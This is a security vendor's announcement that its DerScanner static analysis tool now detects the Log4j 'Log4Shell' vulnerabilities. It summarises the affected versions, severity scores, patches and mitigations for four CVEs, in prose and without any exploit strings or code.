DerScanner’s vulnerability database now includes Log4Shell zero-day threats
Author: Athena Dynamics & DerSecur
Copyright © 2021 All Rights Reserved
DerSecur has updated the vulnerability database of the DerScanner SAST analysis tool: it now includes the recently discovered zero-day vulnerabilities in the Apache Log4j library. The Apache Log4j library is used by millions of enterprise applications and Java servers to log error messages. The abovementioned library vulnerabilities are called Log4Shell (or LogJam, LogJ) and classified as Remote Code Execution (RCE), Local Code Execution (LCE). In addition, the possibility for Denial of Service (DOS) attacks was detected.
Before the update, DerScanner engine was able to detect any untrusted logged data and marked them as a “Log Forging” vulnerability. The code analysis tool has now been updated with additional rules that allow highlighting Log4Shell vulnerabilities in the list of detected “Log Forging” vulnerabilities.
“Companies around the world are widely using the vulnerable Apache Log4j library to develop Java products. Bearing in mind that exploiting the vulnerabilities is relatively easy, there are numerous vulnerable systems and a large number of attackers who don’t need expert technical skills to hack into these systems,” says Daniil Chernov, CTO of DerSecur. “To make a bad situation worse, many organizations do not have a process in place to monitor vulnerabilities, so despite the availability of security patches and recommendations to fix breaches, some organizations are still at risk. Our research lab monitors Log4Shell vulnerabilities, and the development team promptly adds them to the DerScanner vulnerability database.”
Rules have been added to DerScanner analysis database to search for all vulnerabilities currently detected in the Apache Log4j library:
CVE-2021-44228 (CVSS threat score: 10/10) — critical remote code execution vulnerability, which affects Log4j versions from 2.0-beta9 to 2.14.1. Partially fixed in patch 2.15.0.
The vulnerability makes it possible to store a specific string in logs of Java-based applications and servers that use the Log4j library. When an application or server processes the logs, the string can force the vulnerable system to download and run malicious code. As a result, the attacker can gain full control over the vulnerable application or server. After that the attack can develop further.
The Apache Software Foundation developers have released an emergency security update — the problem has been partially fixed in version 2.15.0. Version 2.15.0 does not take into account some logging options making it possible for intruders to attack a vulnerable system.
Patch 2.15.0 fixes the vulnerability by disabling lookup JNDI messages. In non-default configurations, it can be used to create a malicious input using the JNDI lookup pattern. This can lead to a Denial of Service attack and execution of arbitrary code. This scenario has been assigned a separate CVE-2021-45046 identifier.
CVE-2021-44228 can be exploited if log4j2.formatMsgNoLookups is set to false. To prevent attacks, the Log4j 2.15.0 patch sets this parameter to true. When updating to 2.15.0, the parameter should not be set to false. Log4j library users who have not updated, but set the parameter to true, can block attacks.
CVE-2021-45046 (CVSS threat score: 9/10) — critical vulnerability that can be leveraged to conduct DoS attacks and remote code execution. The problem affects Log4j versions from 2.0-beta9 to 2.15.0 (2.12.2 is an exception).
In Log4j version 2.15.0, it was possible to exploit the CVE-2021-44228 vulnerability with specific custom configuration settings. Only one aspect of JNDI’s message search functionality was disabled in it. In 2.16 update, JNDI support was disabled by default, and message search processing was completely removed.
CVE-2021-45105 (CVSS threat score: 7.5/10) — dangerous DoS vulnerability in systems based on Java 8, which allows to cause denial of service and appears as a loop and crash when processing certain strings.
The vulnerability affects Log4j versions from 2.0-beta9 to 2.16.0. The abovementioned versions lacked protection against uncontrolled recursion making it possible for an attacker to cause a loop by manipulating a value during substitution. The loop caused the stack to run out of space and the process to crash. The patch was released for version 2.17.0.
CVE-2021-4104 (CVSS threat score: 8.1/10) — insecure deserialization vulnerability affecting Log4j 1.2 versions. No fix, update to version 2.17.0 is required.